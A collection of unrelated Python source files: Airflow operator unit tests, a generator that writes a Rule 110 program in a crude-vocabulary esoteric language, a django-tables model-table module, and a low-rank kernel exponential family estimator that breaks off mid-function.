# self.get_output('triplet_loss_4x')[0] + self.get_output('triplet_loss_1x')[0]) / 4.0
final_output = self.get_output('triplet_loss_2x')[0]
self.layers["final_triplet_loss"] = [final_output]
# (self.feed(['features_8x_l', 'features4x_l', 'features_2x_l', 'features_1x_l'])
# .concat(axis=3, name="final_features_l_out"))
#
# (self.feed(['features_8x_r', 'features4x_r', 'features_2x_r', 'features_1x_r'])
# .concat(axis=3, name="final_features_r_out"))
pass
| |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function, unicode_literals
import copy
import logging
import os
import unittest
from datetime import timedelta
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.models import TaskInstance as TI, DAG, DagRun
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from airflow.operators.python_operator import ShortCircuitOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.state import State
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
END_DATE = timezone.datetime(2016, 1, 2)
INTERVAL = timedelta(hours=12)
FROZEN_NOW = timezone.datetime(2016, 1, 2, 12, 1, 1)
TI_CONTEXT_ENV_VARS = ['AIRFLOW_CTX_DAG_ID',
'AIRFLOW_CTX_TASK_ID',
'AIRFLOW_CTX_EXECUTION_DATE',
'AIRFLOW_CTX_DAG_RUN_ID']
class PythonOperatorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(PythonOperatorTest, cls).setUpClass()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
def setUp(self):
super(PythonOperatorTest, self).setUp()
configuration.load_test_config()
self.dag = DAG(
'test_dag',
default_args={
'owner': 'airflow',
'start_date': DEFAULT_DATE},
schedule_interval=INTERVAL)
self.addCleanup(self.dag.clear)
self.clear_run()
self.addCleanup(self.clear_run)
def tearDown(self):
super(PythonOperatorTest, self).tearDown()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
for var in TI_CONTEXT_ENV_VARS:
if var in os.environ:
del os.environ[var]
def do_run(self):
self.run = True
def clear_run(self):
self.run = False
def is_run(self):
return self.run
def test_python_operator_run(self):
"""Tests that the python callable is invoked on task run."""
task = PythonOperator(
python_callable=self.do_run,
task_id='python_operator',
dag=self.dag)
self.assertFalse(self.is_run())
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
self.assertTrue(self.is_run())
def test_python_operator_python_callable_is_callable(self):
"""Tests that PythonOperator will only instantiate if
the python_callable argument is callable."""
not_callable = {}
with self.assertRaises(AirflowException):
PythonOperator(
python_callable=not_callable,
task_id='python_operator',
dag=self.dag)
not_callable = None
with self.assertRaises(AirflowException):
PythonOperator(
python_callable=not_callable,
task_id='python_operator',
dag=self.dag)
def test_python_operator_shallow_copy_attr(self):
not_callable = lambda x: x
original_task = PythonOperator(
python_callable=not_callable,
task_id='python_operator',
op_kwargs={'certain_attrs': ''},
dag=self.dag
)
new_task = copy.deepcopy(original_task)
# shallow copy op_kwargs
self.assertEqual(id(original_task.op_kwargs['certain_attrs']),
id(new_task.op_kwargs['certain_attrs']))
# shallow copy python_callable
self.assertEqual(id(original_task.python_callable),
id(new_task.python_callable))
def _env_var_check_callback(self):
self.assertEqual('test_dag', os.environ['AIRFLOW_CTX_DAG_ID'])
self.assertEqual('hive_in_python_op', os.environ['AIRFLOW_CTX_TASK_ID'])
self.assertEqual(DEFAULT_DATE.isoformat(),
os.environ['AIRFLOW_CTX_EXECUTION_DATE'])
self.assertEqual('manual__' + DEFAULT_DATE.isoformat(),
os.environ['AIRFLOW_CTX_DAG_RUN_ID'])
def test_echo_env_variables(self):
"""
Test that env variables are exported correctly to the
python callback in the task.
"""
self.dag.create_dagrun(
run_id='manual__' + DEFAULT_DATE.isoformat(),
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
state=State.RUNNING,
external_trigger=False,
)
t = PythonOperator(task_id='hive_in_python_op',
dag=self.dag,
python_callable=self._env_var_check_callback
)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
class BranchOperatorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(BranchOperatorTest, cls).setUpClass()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
def setUp(self):
self.dag = DAG('branch_operator_test',
default_args={
'owner': 'airflow',
'start_date': DEFAULT_DATE},
schedule_interval=INTERVAL)
self.branch_1 = DummyOperator(task_id='branch_1', dag=self.dag)
self.branch_2 = DummyOperator(task_id='branch_2', dag=self.dag)
def tearDown(self):
super(BranchOperatorTest, self).tearDown()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
def test_without_dag_run(self):
"""This checks the defensive against non existent tasks in a dag run"""
self.branch_op = BranchPythonOperator(task_id='make_choice',
dag=self.dag,
python_callable=lambda: 'branch_1')
self.branch_1.set_upstream(self.branch_op)
self.branch_2.set_upstream(self.branch_op)
self.dag.clear()
self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
with create_session() as session:
tis = session.query(TI).filter(
TI.dag_id == self.dag.dag_id,
TI.execution_date == DEFAULT_DATE
)
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1':
# should exist with state None
self.assertEqual(ti.state, State.NONE)
elif ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.SKIPPED)
else:
raise Exception
def test_branch_list_without_dag_run(self):
"""This checks if the BranchPythonOperator supports branching off to a list of tasks."""
self.branch_op = BranchPythonOperator(task_id='make_choice',
dag=self.dag,
python_callable=lambda: ['branch_1', 'branch_2'])
self.branch_1.set_upstream(self.branch_op)
self.branch_2.set_upstream(self.branch_op)
self.branch_3 = DummyOperator(task_id='branch_3', dag=self.dag)
self.branch_3.set_upstream(self.branch_op)
self.dag.clear()
self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
with create_session() as session:
tis = session.query(TI).filter(
TI.dag_id == self.dag.dag_id,
TI.execution_date == DEFAULT_DATE
)
expected = {
"make_choice": State.SUCCESS,
"branch_1": State.NONE,
"branch_2": State.NONE,
"branch_3": State.SKIPPED,
}
for ti in tis:
if ti.task_id in expected:
self.assertEqual(ti.state, expected[ti.task_id])
else:
raise Exception
def test_with_dag_run(self):
self.branch_op = BranchPythonOperator(task_id='make_choice',
dag=self.dag,
python_callable=lambda: 'branch_1')
self.branch_1.set_upstream(self.branch_op)
self.branch_2.set_upstream(self.branch_op)
self.dag.clear()
dr = self.dag.create_dagrun(
run_id="manual__",
start_date=timezone.utcnow(),
execution_date=DEFAULT_DATE,
state=State.RUNNING
)
self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1':
self.assertEqual(ti.state, State.NONE)
elif ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.SKIPPED)
else:
raise Exception
def test_with_skip_in_branch_downstream_dependencies(self):
self.branch_op = BranchPythonOperator(task_id='make_choice',
dag=self.dag,
python_callable=lambda: 'branch_1')
self.branch_op >> self.branch_1 >> self.branch_2
self.branch_op >> self.branch_2
self.dag.clear()
dr = self.dag.create_dagrun(
run_id="manual__",
start_date=timezone.utcnow(),
execution_date=DEFAULT_DATE,
state=State.RUNNING
)
self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1':
self.assertEqual(ti.state, State.NONE)
elif ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.NONE)
else:
raise Exception
def test_with_skip_in_branch_downstream_dependencies2(self):
self.branch_op = BranchPythonOperator(task_id='make_choice',
dag=self.dag,
python_callable=lambda: 'branch_2')
self.branch_op >> self.branch_1 >> self.branch_2
self.branch_op >> self.branch_2
self.dag.clear()
dr = self.dag.create_dagrun(
run_id="manual__",
start_date=timezone.utcnow(),
execution_date=DEFAULT_DATE,
state=State.RUNNING
)
self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1':
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.NONE)
else:
raise Exception
class ShortCircuitOperatorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(ShortCircuitOperatorTest, cls).setUpClass()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
def tearDown(self):
super(ShortCircuitOperatorTest, self).tearDown()
with create_session() as session:
session.query(DagRun).delete()
session.query(TI).delete()
def test_without_dag_run(self):
"""This checks the defensive against non existent tasks in a dag run"""
value = False
dag = DAG('shortcircuit_operator_test_without_dag_run',
default_args={
'owner': 'airflow',
'start_date': DEFAULT_DATE
},
schedule_interval=INTERVAL)
short_op = ShortCircuitOperator(task_id='make_choice',
dag=dag,
python_callable=lambda: value)
branch_1 = DummyOperator(task_id='branch_1', dag=dag)
branch_1.set_upstream(short_op)
branch_2 = DummyOperator(task_id='branch_2', dag=dag)
branch_2.set_upstream(branch_1)
upstream = DummyOperator(task_id='upstream', dag=dag)
upstream.set_downstream(short_op)
dag.clear()
short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
with create_session() as session:
tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.execution_date == DEFAULT_DATE
)
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'upstream':
# should not exist
raise Exception
elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.SKIPPED)
else:
raise Exception
value = True
dag.clear()
short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'upstream':
# should not exist
raise Exception
elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.NONE)
else:
raise Exception
def test_with_dag_run(self):
value = False
dag = DAG('shortcircuit_operator_test_with_dag_run',
default_args={
'owner': 'airflow',
'start_date': DEFAULT_DATE
},
schedule_interval=INTERVAL)
short_op = ShortCircuitOperator(task_id='make_choice',
dag=dag,
python_callable=lambda: value)
branch_1 = DummyOperator(task_id='branch_1', dag=dag)
branch_1.set_upstream(short_op)
branch_2 = DummyOperator(task_id='branch_2', dag=dag)
branch_2.set_upstream(branch_1)
upstream = DummyOperator(task_id='upstream', dag=dag)
upstream.set_downstream(short_op)
dag.clear()
logging.error("Tasks {}".format(dag.tasks))
dr = dag.create_dagrun(
run_id="manual__",
start_date=timezone.utcnow(),
execution_date=DEFAULT_DATE,
state=State.RUNNING
)
upstream.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 4)
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'upstream':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.SKIPPED)
else:
raise Exception
value = True
dag.clear()
dr.verify_integrity()
upstream.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 4)
for ti in tis:
if ti.task_id == 'make_choice':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'upstream':
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
self.assertEqual(ti.state, State.NONE)
else:
raise Exception
| |
### ARGS ###
iterations = 40;
gridWidth = 40;
## Vars ##
indentLevel = 0;
file = open("110-generated.fet", "w")
def indent():
global indentLevel
indentLevel = indentLevel + 1
def unindent():
global indentLevel
indentLevel = indentLevel - 1
def newline():
printCode( "" )
def printCode( code ):
global indentLevel
file.write( "\t" * indentLevel )
file.write( code )
file.write( "\n" )
## These things are constant for any size
def generateIntro():
printCode( 'Make Laura moan' )
printCode( 'Make Julia moan "#' + "0" * (gridWidth-3) + '1#"' )
newline()
printCode( 'Make startString moan "#0"' )
printCode( 'Make endString moan "0#"' )
newline()
printCode( 'Lick AsciiZero forty eight times' )
printCode( 'Lick AsciiOne forty nine times' )
printCode( 'Lick AsciiOcto\'s thigh thirty five times' )
newline()
printCode ( "Worship Counter" )
printCode ( "Worship iterations" )
newline()
printCode( "Worship left" )
printCode( "Worship middle" )
printCode( "Worship right" )
newline()
newline()
newline()
## A better solution would write the string literal for the number, but this is generated code, so allow my laziness.
def generateNumbers():
printCode( "Worship number0" )
for i in range( 1, max(gridWidth - 1, iterations)+1 ):
variableName = "number" + str( i )
for j in range (0, i):
printCode( "lick " + variableName )
newline()
newline()
def beginLoop():
printCode( "while iterations is submissive to Number" + str(iterations) )
indent()
newline()
newline()
def setEmptyPositions():
for i in range (2, gridWidth - 2):
printCode( "make position" + str(i) + " moan")
printCode( "make nextposition" + str(i) + " moan")
newline()
newline()
def resetTempVariables():
printCode( "Have left spank left" )
printCode( "Have middle spank middle" )
printCode( "Have right spank right" )
printCode( "Have counter spank counter" )
printCode( "Make Laura moan" )
newline()
def incrementLoopCounter():
printCode( "lick iterations" )
newline()
def printCurrentState():
printCode( "Make Slave Scream Julia" )
newline()
def generateParentString( pos ):
printCode( "If counter is submissive to number" + str( pos + 2 ) )
indent()
printCode( "If counter is dominant towards number" + str( pos -2 ) )
indent()
printCode( "Have Emma hogtie position" + str( pos ) )
unindent()
unindent()
newline()
#This function is the main trick to running the 110.
#For each cell, we create a string that contains three chars:
#The ones relevant to it's activation.
def getParentStrings():
printCode( "Bind Emma to Julia" )
indent()
printCode( "If Emma is not AsciiOcto" )
indent()
for i in range (2, gridWidth - 2):
generateParentString( i )
unindent()
printCode( "lick counter" )
unindent()
newline()
newline()
newline()
def getDescendants():
for i in range (2, gridWidth - 2):
getDescendant( i )
newline()
newline()
newline()
def getDescendant( pos ):
printCode( "Have counter spank counter" )
printCode( "Have left spank left" )
printCode( "Have middle spank middle" )
printCode( "Have right spank right" )
newline()
newline()
printCode( "Bind Emma to position" + str( pos ) )
indent()
printCode( "if counter is number0" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick left" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick left" )
unindent()
unindent()
printCode( "if counter is number1" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick middle" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick middle" )
unindent()
unindent()
printCode( "if counter is number2" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick right" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick right" )
unindent()
unindent()
printCode( "Lick counter" )
unindent()
newline()
newline()
printCode( "if left is AsciiOne" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "if right is AsciiZero" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
printCode( "if middle is AsciiZero" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
printCode( "if left is AsciiZero" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
newline()
newline()
newline()
def writeNextGeneration():
printCode( "make Laura moan \"#0\"" )
for i in range (2, gridWidth - 2):
writeNextGenerationPosition( i )
printCode( "have AsciiZero hogtie Laura" )
printCode( "have AsciiOcto hogtie Laura" )
newline()
newline()
newline()
def writeNextGenerationPosition( pos ):
printCode( "bind Emma to nextposition" + str( pos ) )
indent()
printCode( "if Emma is AsciiZero" )
indent()
printCode( "have AsciiZero hogtie Laura" )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiOne hogtie Laura" )
unindent()
unindent()
def saveNextGeneration():
printCode( "Make Julia moan" )
printCode( "bind Emma to Laura" )
indent()
printCode( "have Emma hogtie Julia" )
def main():
generateIntro()
generateNumbers()
beginLoop()
resetTempVariables()
setEmptyPositions()
incrementLoopCounter()
printCurrentState()
getParentStrings()
getDescendants()
writeNextGeneration()
saveNextGeneration()
main()
| |
from django.core.exceptions import FieldError
from django.utils.datastructures import SortedDict
from tables import BaseTable, DeclarativeColumnsMetaclass, \
Column, BoundRow, Rows, TableOptions, rmprefix, toggleprefix
__all__ = ('BaseModelTable', 'ModelTable')
class ModelTableOptions(TableOptions):
def __init__(self, options=None):
super(ModelTableOptions, self).__init__()
self.model = getattr(options, 'model', None)
self.columns = getattr(options, 'columns', None)
self.exclude = getattr(options, 'exclude', None)
def columns_for_model(model, columns=None, exclude=None):
"""
Returns a ``SortedDict`` containing form columns for the given model.
``columns`` is an optional list of field names. If provided, only the
named model fields will be included in the returned column list.
``exclude`` is an optional list of field names. If provided, the named
model fields will be excluded from the returned list of columns, even
if they are listed in the ``fields`` argument.
"""
field_list = []
opts = model._meta
for f in opts.fields + opts.many_to_many:
if (columns and not f.name in columns) or \
(exclude and f.name in exclude):
continue
column = Column() # TODO: chose correct column type, with right options
if column:
field_list.append((f.name, column))
return SortedDict(field_list)
class ModelTableMetaclass(DeclarativeColumnsMetaclass):
def __new__(cls, name, bases, attrs):
# Let the default form meta class get the declared columns; store
# those in a separate attribute so that ModelTable inheritance with
# differing models works as expected (the behaviour known from
# ModelForms).
self = super(ModelTableMetaclass, cls).__new__(
cls, name, bases, attrs, parent_cols_from='declared_columns')
self.declared_columns = self.base_columns
opts = self._meta = ModelTableOptions(getattr(self, 'Meta', None))
# if a model is defined, then build a list of default columns and
# let the declared columns override them.
if opts.model:
columns = columns_for_model(opts.model, opts.columns, opts.exclude)
columns.update(self.declared_columns)
self.base_columns = columns
return self
class BaseModelTable(BaseTable):
"""Table that is based on a model.
Similar to ModelForm, a column will automatically be created for all
the model's fields. You can modify this behaviour with a inner Meta
class:
class MyTable(ModelTable):
class Meta:
model = MyModel
exclude = ['fields', 'to', 'exclude']
fields = ['fields', 'to', 'include']
One difference to a normal table is the initial data argument. It can
be a queryset or a model (it's default manager will be used). If you
just don't any data at all, the model the table is based on will
provide it.
"""
def __init__(self, data=None, *args, **kwargs):
if data == None:
if self._meta.model is None:
raise ValueError('Table without a model association needs '
'to be initialized with data')
self.queryset = self._meta.model._default_manager.all()
elif hasattr(data, '_default_manager'): # saves us db.models import
self.queryset = data._default_manager.all()
else:
self.queryset = data
super(BaseModelTable, self).__init__(self.queryset, *args, **kwargs)
self._rows = ModelRows(self)
def _validate_column_name(self, name, purpose):
"""Overridden. Only allow model-based fields and valid model
spanning relationships to be sorted."""
# let the base class sort out the easy ones
result = super(BaseModelTable, self)._validate_column_name(name, purpose)
if not result:
return False
if purpose == 'order_by':
column = self.columns[name]
# "data" can really be used in two different ways. It is
# slightly confusing and potentially should be changed.
# It can either refer to an attribute/field which the table
# column should represent, or can be a callable (or a string
# pointing to a callable attribute) that is used to render to
# cell. The difference is that in the latter case, there may
# still be an actual source model field behind the column,
# stored in "declared_name". In other words, we want to filter
# out column names that are not oderable, and the column name
# we need to check may either be stored in "data" or in
# "declared_name", depending on if and what kind of value is
# in "data". This is the reason why we try twice.
#
# See also bug #282964.
#
# TODO: It might be faster to try to resolve the given name
# manually recursing the model metadata rather than
# constructing a queryset.
for lookup in (column.column.data, column.declared_name):
if not lookup or callable(lookup):
continue
try:
# let django validate the lookup
_temp = self.queryset.order_by(lookup)
_temp.query.as_sql()
break
except FieldError:
pass
else:
return False
# if we haven't failed by now, the column should be valid
return True
def _build_snapshot(self):
"""Overridden. The snapshot in this case is simply a queryset
with the necessary filters etc. attached.
"""
# reset caches
self._columns._reset()
self._rows._reset()
queryset = self.queryset
if self.order_by:
actual_order_by = self._resolve_sort_directions(self.order_by)
queryset = queryset.order_by(*self._cols_to_fields(actual_order_by))
self._snapshot = queryset
def _get_rows(self):
for row in self.data:
yield BoundModelRow(self, row)
class ModelTable(BaseModelTable):
__metaclass__ = ModelTableMetaclass
class ModelRows(Rows):
def __init__(self, *args, **kwargs):
super(ModelRows, self).__init__(*args, **kwargs)
self.row_klass = BoundModelRow
def _reset(self):
self._length = None
def __len__(self):
"""Use the queryset count() method to get the length, instead of
loading all results into memory. This allows, for example,
smart paginators that use len() to perform better.
"""
if getattr(self, '_length', None) is None:
self._length = self.table.data.count()
return self._length
# for compatibility with QuerySetPaginator
count = __len__
class BoundModelRow(BoundRow):
"""Special version of the BoundRow class that can handle model instances
as data.
We could simply have ModelTable spawn the normal BoundRow objects
with the instance converted to a dict instead. However, this way allows
us to support non-field attributes and methods on the model as well.
"""
def __getitem__(self, name):
"""Overridden. Return this row's data for a certain column, with
custom handling for model tables.
"""
# find the column for the requested field, for reference
boundcol = self.table._columns[name]
# If the column has a name override (we know then that is was also
# used for access, e.g. if the condition is true, then
# ``boundcol.column.name == name``), we need to make sure we use the
# declaration name to access the model field.
if boundcol.column.data:
if callable(boundcol.column.data):
result = boundcol.column.data(self)
if not result:
if boundcol.column.default is not None:
return boundcol.get_default(self)
return result
else:
name = boundcol.column.data
else:
name = boundcol.declared_name
# try to resolve relationships spanning attributes
bits = name.split('__')
current = self.data
for bit in bits:
# note the difference between the attribute being None and not
# existing at all; assume "value doesn't exist" in the former
# (e.g. a relationship has no value), raise error in the latter.
# a more proper solution perhaps would look at the model meta
# data instead to find out whether a relationship is valid; see
# also ``_validate_column_name``, where such a mechanism is
# already implemented).
if not hasattr(current, bit):
raise ValueError("Could not resolve %s from %s" % (bit, name))
current = getattr(current, bit)
if callable(current):
current = current()
# important that we break in None case, or a relationship
# spanning across a null-key will raise an exception in the
# next iteration, instead of defaulting.
if current is None:
break
if current is None:
# ...the whole name (i.e. the last bit) resulted in None
if boundcol.column.default is not None:
return boundcol.get_default(self)
return current
| |
from abc import abstractmethod
from scipy.sparse.linalg.interface import LinearOperator
from scipy.sparse.linalg.isolve.iterative import bicgstab
from kernel_exp_family.estimators.lite.gaussian import KernelExpLiteGaussian
try:
from kernel_exp_family.estimators.parameter_search_bo import BayesOptSearch
except ImportError:
print "Bayesian Optimization for hyper-parameters unavailable -- pybo required"
from kernel_exp_family.kernels.incomplete_cholesky import incomplete_cholesky_gaussian, \
incomplete_cholesky_new_points_gaussian
from kernel_exp_family.tools.assertions import assert_array_shape
from kernel_exp_family.tools.log import Log
import numpy as np
logger = Log.get_logger()
def compute_b(X, Y, L_X, L_Y, sigma):
assert X.shape[1] == Y.shape[1]
assert L_X.shape[0] == X.shape[0]
assert L_Y.shape[0] == Y.shape[0]
NX = len(X)
D = X.shape[1]
b = np.zeros(NX)
LX1 = L_X.dot(np.sum(L_Y.T, 1))
for l in np.arange(D):
x_l = X[:, l]
y_l = Y[:, l]
s_l = x_l ** 2
t_l = y_l ** 2
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
D_s_LX = s_l[:, np.newaxis] * L_X
D_x_LX = x_l[:, np.newaxis] * L_X
# compute b incrementally exploiting the Cholesky factorisation of K
b += 2. / sigma * (L_X.dot(L_Y.T.dot(t_l)) \
+ D_s_LX.dot(np.sum(L_Y.T, 1)) \
- 2 * D_x_LX.dot(L_Y.T.dot(y_l))) - LX1
return b
def apply_left_C(v, X, Y, L_X, L_Y, lmbda):
assert len(v.shape) == 1
assert len(X) == len(L_X)
assert len(Y) == len(L_Y)
assert L_X.shape[1] == L_Y.shape[1]
assert X.shape[1] == Y.shape[1]
N_X = X.shape[0]
D = X.shape[1]
# multiply C to v (C is a sum over d=1...D)
result = np.zeros(N_X)
for l in range(D):
x_l = X[:, l]
y_l = Y[:, l]
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
# D_x_KXY = x_l[:, np.newaxis] * K
# KXY_D_y = K * y_l
# KXY_T_D_x = K.T * x_l
# D_y_KXY_T = y_l[:, np.newaxis] * K.T
# C += (D_x_KXY - KXY_D_y).dot(KXY_T_D_x - D_y_KXY_T)
D_x_LX = x_l[:, np.newaxis] * L_X
LY_T_D_y = L_Y.T * y_l
LX_T_D_x = L_X.T * x_l
D_y_LY = y_l[:, np.newaxis] * L_Y
# right term of product
x = L_X.T.dot(v)
x = D_y_LY.dot(x)
y = LX_T_D_x.dot(v)
y = L_Y.dot(y)
# right term times v
temp = x - y
# term of product
x = LY_T_D_y.dot(temp)
x = L_X.dot(x)
y = L_Y.T.dot(temp)
y = D_x_LX.dot(y)
# add both terms times v to result
result += x - y
if lmbda > 0:
# regularise with K=L_X.dot(L_X.T)
result += lmbda * L_X.dot(L_X.T.dot(v))
# regularise with I
result += lmbda * v
return result
def fit(X, Y, sigma, lmbda, L_X, L_Y,
cg_tol=1e-3,
cg_maxiter=None,
alpha0=None):
if cg_maxiter is None:
# CG needs at max dimension many iterations
cg_maxiter = L_X.shape[0]
NX = X.shape[0]
# set up and solve regularised linear system via bicgstab
# this never stores an NxN matrix
b = compute_b(X, Y, L_X, L_Y, sigma)
matvec = lambda v:apply_left_C(v, X, Y, L_X, L_Y, lmbda)
C_operator = LinearOperator((NX, NX), matvec=matvec, dtype=np.float64)
# for printing number of CG iterations
global counter
counter = 0
def callback(x):
global counter
counter += 1
# start optimisation from alpha0, if present
if alpha0 is not None:
logger.debug("Starting bicgstab from previous alpha0")
solution, info = bicgstab(C_operator, b, tol=cg_tol, maxiter=cg_maxiter, callback=callback, x0=alpha0)
logger.debug("Ran bicgstab for %d iterations." % counter)
if info > 0:
logger.warning("Warning: CG not convergence in %.3f tolerance within %d iterations" % \
(cg_tol, cg_maxiter))
a = -sigma / 2. * solution
return a
def objective(X, Y, sigma, lmbda, alpha, L_X, L_Y, b=None):
if b is None:
b = compute_b(X, Y, L_X, L_Y, sigma)
N_X = len(X)
first = 2. / (N_X * sigma) * alpha.dot(b)
second = 2. / (N_X * sigma ** 2) * alpha.dot(apply_left_C(alpha, X, Y, L_X, L_Y, lmbda))
J = first + second
return J
class KernelExpLiteGaussianLowRank(KernelExpLiteGaussian):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None):
KernelExpLiteGaussian.__init__(self, sigma, lmbda, D, N)
self.eta = eta
self.cg_tol = cg_tol
self.cg_maxiter = cg_maxiter
@abstractmethod
def fit_wrapper_(self):
self.inc_cholesky = incomplete_cholesky_gaussian(self.X, self.sigma, eta=self.eta)
L_X = self.inc_cholesky["R"].T
logger.debug("Incomplete Cholesky using rank %d/%d capturing %.3f/1.0 of the variance " % \
(len(self.inc_cholesky['I']), len(self.X), self.eta))
# start optimisation from previous alpha
alpha0 = self.alpha if len(self.alpha) == len(self.X) and len(self.alpha) > 0 else np.zeros(len(self.X))
return fit(self.X, self.X, self.sigma, self.lmbda, L_X, L_X, self.cg_tol, self.cg_maxiter, alpha0)
def objective(self, X):
assert_array_shape(X, ndim=2, dims={1: self.D})
L_X = self.inc_cholesky["R"].T
L_Y = incomplete_cholesky_new_points_gaussian(self.X, X, self.sigma, self.inc_cholesky['I'], self.inc_cholesky['R'], self.inc_cholesky['nu']).T
b = compute_b(self.X, X, L_X, L_Y, self.sigma)
return objective(self.X, X, self.sigma, self.lmbda, self.alpha, L_X, L_Y, b)
class KernelExpLiteGaussianLowRankAdaptive(KernelExpLiteGaussianLowRank):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None,
num_initial_evaluations=3, num_evaluations=3, minimum_size_learning=100,
num_initial_evaluations_relearn=1, num_evaluations_relearn=1,
param_bounds={'sigma': [-3,3]}):
KernelExpLiteGaussianLowRank.__init__(self, sigma, lmbda, D, N, eta, cg_tol, cg_maxiter)
self.bo = None
self.param_bounds = param_bounds
self.num_initial_evaluations = num_initial_evaluations
self.num_iter = num_evaluations
self.minimum_size_learning = minimum_size_learning
self.n_initial_relearn = num_initial_evaluations_relearn
self.n_iter_relearn = num_evaluations_relearn
self.learning_parameters = False
def fit(self, X):
# avoid infinite recursion from x-validation fit call
if not self.learning_parameters and len(X)>=self.minimum_size_learning:
self.learning_parameters = True
if self.bo is None:
logger.info("Bayesian optimisation from scratch.")
